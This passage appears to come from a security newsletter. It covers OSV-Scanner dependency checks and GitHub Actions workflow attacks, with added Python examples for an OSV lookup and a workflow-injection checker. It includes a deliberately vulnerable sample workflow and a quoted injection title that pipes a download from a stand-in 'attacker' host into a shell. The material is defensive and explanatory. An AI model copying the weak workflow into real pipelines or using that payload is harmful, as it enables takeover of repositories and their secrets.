#45

Google OSV-Scanner

OSV-Scanner is Google's tool for finding known vulnerabilities in a project's dependencies: it reads lockfiles and SBOMs and matches every package version against the OSV database. I think it's a good addition to your SSDLC. https://github.com/google/osv-scanner
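What OSV-Scanner does for each dependency is a lookup of (ecosystem, name, version) against the OSV database, and the same lookup is exposed to anyone through the batch API at https://api.osv.dev/v1/querybatch. The script below is an added example, not code from the newsletter or from OSV-Scanner: it builds that request from a pip requirements file and turns the answer into a CI pass/fail. The requirements text, the API response and the placeholder advisory IDs are constructed sample data so that it runs offline; `query_osv()` is the only function that touches the network and is not called unless you pass `--live`.

```python
"""Added example: OSV batch lookup for pinned pip requirements, as a CI gate.

Not code from the newsletter or from OSV-Scanner. The requirements file and
the API response are constructed; only query_osv() talks to api.osv.dev.
"""
import json
import re
import sys
import urllib.request

OSV_BATCH_URL = "https://api.osv.dev/v1/querybatch"

# Constructed sample: a pinned requirements file as produced by `pip freeze`.
SAMPLE_REQUIREMENTS = """\
# web app dependencies
requests==2.25.1
pyyaml==5.3.1      # pinned for an old plugin
jinja2==3.1.2
flask>=2.0         # unpinned: OSV needs an exact version, so it is skipped
"""

# Constructed sample of a /v1/querybatch response. results[i] answers
# queries[i]. The IDs are placeholders, not real advisories; a live
# response carries OSV/GHSA/CVE identifiers instead.
SAMPLE_RESPONSE = {
    "results": [
        {"vulns": []},                                                # requests
        {"vulns": [{"id": "EXAMPLE-0001"}]},                          # pyyaml
        {"vulns": [{"id": "EXAMPLE-0002"}, {"id": "EXAMPLE-0003"}]},  # jinja2
    ]
}

PIN_RE = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)\s*==\s*([^\s#]+)")


def parse_requirements(text):
    """Return [(name, version)] for every exact 'name==version' pin.

    Comments and range specifiers are skipped: OSV matches exact versions."""
    pins = []
    for line in text.splitlines():
        m = PIN_RE.match(line)
        if m:
            pins.append((m.group(1).lower(), m.group(2)))
    return pins


def build_querybatch(pins, ecosystem="PyPI"):
    """Build the JSON body OSV expects: one {package, version} query per pin."""
    return {"queries": [
        {"package": {"name": name, "ecosystem": ecosystem}, "version": version}
        for name, version in pins]}


def query_osv(body, timeout=30):
    """POST the batch to api.osv.dev (network; not used in the offline run)."""
    req = urllib.request.Request(
        OSV_BATCH_URL, data=json.dumps(body).encode(),
        headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


def match_findings(pins, response):
    """Map each pinned package to the advisory IDs returned for it.

    A length mismatch means the response does not belong to this request,
    so fail loudly instead of silently reporting a clean scan."""
    results = response.get("results", [])
    if len(results) != len(pins):
        raise ValueError(f"expected {len(pins)} results, got {len(results)}")
    findings = {}
    for (name, version), result in zip(pins, results):
        ids = [v["id"] for v in result.get("vulns", [])]  # {} when clean
        if ids:
            findings[f"{name}=={version}"] = ids
    return findings


def exit_code(findings):
    """CI gate: non-zero when any dependency has a known advisory."""
    return 1 if findings else 0


if __name__ == "__main__":
    pins = parse_requirements(SAMPLE_REQUIREMENTS)
    body = build_querybatch(pins)
    response = query_osv(body) if "--live" in sys.argv else SAMPLE_RESPONSE
    findings = match_findings(pins, response)
    for dep, ids in findings.items():
        print(f"{dep}: {', '.join(ids)}")
    sys.exit(exit_code(findings))
```

Run it as-is to see the offline result, or with `--live` to query the real database for the three pins. The positional coupling between `queries` and `results` is the part worth remembering: a scanner that does not check the lengths match can report a clean build on a malformed or partial response.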

4-part series about hacking GitHub Actions workflows

If I were to predict which attacks will grow in popularity in 2023, I would bet on attacks against different kinds of software development pipelines. They are getting more automated and do more on their own, which opens up more possibilities for interesting attacks...
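Two patterns account for most of the workflow bugs this kind of research turns up: a `run:` script that interpolates attacker-controlled event data (a pull request title, a branch name) straight into the shell, and a `pull_request_target` job, which runs with the repository's write token, checking out the untrusted PR head. The checker below is an added example, not code from the newsletter or from the linked series: a small regex-based scan for both patterns, with a constructed weak workflow next to its hardened version. The list of untrusted contexts is a subset of the event fields GitHub documents as user-controllable; the function names and messages are this example's own.

```python
"""Added example: spot expression injection and unsafe pull_request_target
checkouts in a GitHub Actions workflow. Not code from the newsletter or the
linked series; both workflows below are constructed for the example."""
import re

# Subset of event fields GitHub documents as attacker-controllable.
UNTRUSTED_CONTEXTS = [
    r"github\.event\.issue\.(title|body)",
    r"github\.event\.pull_request\.(title|body)",
    r"github\.event\.pull_request\.head\.(ref|label)",
    r"github\.event\.comment\.body",
    r"github\.event\.review\.body",
    r"github\.event\.commits\.[^ }]*\.(message|author\.(name|email))",
    r"github\.event\.head_commit\.(message|author\.(name|email))",
    r"github\.head_ref",
]
UNTRUSTED_RE = re.compile("|".join(f"(?:{p})" for p in UNTRUSTED_CONTEXTS))
EXPR_RE = re.compile(r"\$\{\{\s*(.*?)\s*\}\}")
RUN_RE = re.compile(r"^\s*(?:-\s+)?run:\s*(.*)$")
PR_HEAD_REF_RE = re.compile(
    r"ref:\s*\$\{\{\s*github\.event\.pull_request\.head\.(sha|ref)\s*\}\}")

# Constructed weak workflow: PR title and branch name reach the shell, and
# the PR head is checked out under pull_request_target (write token).
WEAK_WORKFLOW = """\
name: pr-greeter
on:
  pull_request_target:
    types: [opened]
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: echo "Thanks for ${{ github.event.pull_request.title }}"
      - name: multi-line script
        run: |
          echo "branch ${{ github.head_ref }}"
          echo "repo ${{ github.repository }}"
      - run: ./scripts/check.sh
        env:
          TITLE: ${{ github.event.pull_request.title }}
"""

# Constructed hardened version: untrusted data enters the shell only through
# an environment variable, and the trigger is plain pull_request, which gives
# fork PRs a read-only token and no secrets.
HARDENED_WORKFLOW = """\
name: pr-greeter
on:
  pull_request:
    types: [opened]
jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - run: echo "Thanks for $TITLE"
        env:
          TITLE: ${{ github.event.pull_request.title }}
"""


def run_script_lines(lines):
    """Yield (line_no, text) for every line of every run: value, including
    the continuation lines of a | or > block scalar."""
    i = 0
    while i < len(lines):
        m = RUN_RE.match(lines[i])
        if not m:
            i += 1
            continue
        key_col = lines[i].index("run:")
        yield i + 1, m.group(1)
        i += 1
        if m.group(1).strip().rstrip("+-") in ("|", ">"):
            # Block scalar: lines indented deeper than the run: key belong to it.
            while i < len(lines) and (not lines[i].strip()
                                      or len(lines[i]) - len(lines[i].lstrip()) > key_col):
                yield i + 1, lines[i]
                i += 1


def find_workflow_issues(workflow_text):
    """Return [(line_no, message)] sorted by line number."""
    lines = workflow_text.splitlines()
    issues = []
    for line_no, text in run_script_lines(lines):
        for expr in EXPR_RE.findall(text):
            if UNTRUSTED_RE.search(expr):
                issues.append((line_no, f"untrusted input interpolated into run: ${{{{ {expr} }}}}"))
    if re.search(r"\bpull_request_target\b", workflow_text):
        for line_no, text in enumerate(lines, 1):
            if PR_HEAD_REF_RE.search(text):
                issues.append((line_no, "pull_request_target job checks out the PR head with a write token"))
    return sorted(issues)


if __name__ == "__main__":
    for name, wf in (("weak", WEAK_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(f"{name}: {find_workflow_issues(wf) or 'no issues'}")
```

Note what the checker deliberately does not flag: the `env:` mapping in both workflows. Passing `github.event.pull_request.title` through an environment variable and reading `"$TITLE"` in the script is the fix, because the expression is expanded into the variable's value rather than into the shell source text, so a title like `"; curl attacker | sh #` can no longer become a command.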

Finding bugs by reading RFCs

Every hacker has a different hacking style. Some of them are absolutely fascinating to me, like the hacking style of Inti. He likes to simply read the docs or RFCs and do the research. It almost sounds too simple to work, but his findings prove it does. In his recent...